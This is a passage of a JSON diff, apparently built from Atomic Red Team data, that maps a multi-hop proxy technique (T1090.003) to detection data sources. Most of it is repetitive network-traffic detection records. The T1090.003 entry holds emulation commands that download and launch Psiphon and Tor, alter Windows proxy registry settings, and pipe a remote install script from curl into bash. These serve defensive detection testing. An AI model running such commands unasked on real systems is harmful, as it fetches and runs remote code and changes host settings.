the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1090.003", + "command_list": [ + "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", + "invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\\tor\\Tor\\tor.exe}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "sudo systemctl start tor \n", + "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n" + ], + "commands": [ + { + "command": "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", + "source": "atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + }, + { + "command": "invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\\tor\\Tor\\tor.exe}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "source": "atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + }, + { + "command": "sudo systemctl start tor \n", + "source": "atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + }, + { + "command": "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n", + "source": "atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1090.003", + "display_name": "Proxy: Multi-hop Proxy", + "atomic_tests": [ + { + "name": "Psiphon", + "auto_generated_guid": "14d55ca0-920e-4b44-8425-37eedd72b173", + "description": "Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you\nwith uncensored access to Internet.\nThis process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.\nMore information can be found about Psiphon using the following urls\nhttp://s3.amazonaws.com/0ubz-2q11-gi9y/en.html\nhttps://psiphon.ca/faq.html\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The proxy settings backup file must exist on disk at $env:Temp\\proxy-backup.txt\n", + "prereq_command": "if (Test-Path $env:Temp\\proxy-backup.txt) {exit 0} else {exit 1}\n", + "get_prereq_command": "if(-not (test-path $env:Temp\\proxy-backup.txt)){\n$Proxy = (Get-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings' -Name \"ProxyServer\" -ErrorAction Ignore).ProxyServer\nSet-Content $env:Temp\\proxy-backup.txt $Proxy}\n" + }, + { + "description": "The Psiphon executable must exist in the Downloads folder\n", + "prereq_command": "if (Test-Path $env:UserProfile\\Downloads\\psiphon3.exe) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -OutFile \"$env:UserProfile\\Downloads\\psiphon3.exe\" \"https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe\"\n" + } + ], + "executor": { + "name": "powershell", + "command": "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", + "cleanup_command": "$Proxy = Get-Content $env:Temp\\proxy-backup.txt -ErrorAction Ignore\nif($null -ne $Proxy) \n{Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings' -Name \"ProxyServer\" -Value $Proxy}\n" + } + }, + { + "name": "Tor Proxy Usage - Windows", + "auto_generated_guid": "7b9d85e5-c4ce-4434-8060-d3de83595e69", + "description": "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "TorExe": { + "description": "Location of tor.exe file.", + "type": "String", + "default": "$env:temp\\tor\\Tor\\tor.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "tor.exe must be installed on the machine \n", + "prereq_command": "if (Test-Path #{TorExe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip\" -Destination \"$env:temp\\tor.zip\" -dynamic\nexpand-archive -LiteralPath \"$env:temp\\tor.zip\" -DestinationPath \"$env:temp\\tor\"\n" + } + ], + "executor": { + "command": "invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Tor Proxy Usage - Debian/Ubuntu", + "auto_generated_guid": "5ff9d047-6e9c-4357-b39b-5cf89d9b59c7", + "description": "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Tor must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v tor --version)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo apt-get -y install tor\n" + } + ], + "executor": { + "command": "sudo systemctl start tor \n", + "cleanup_command": "sudo systemctl stop tor\n", + "name": "sh" + } + }, + { + "name": "Tor Proxy Usage - MacOS", + "auto_generated_guid": "12631354-fdbc-4164-92be-402527e748da", + "description": "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n", + "supported_platforms": [ + "macos" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Tor must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v tor --version)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "if [ ! -x \"$(command -v brew --version)\" ]; then /bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)\"; fi\nbrew install tor\n" + } + ], + "executor": { + "command": "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n", + "cleanup_command": "killall tor > /dev/null 2>&1\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + 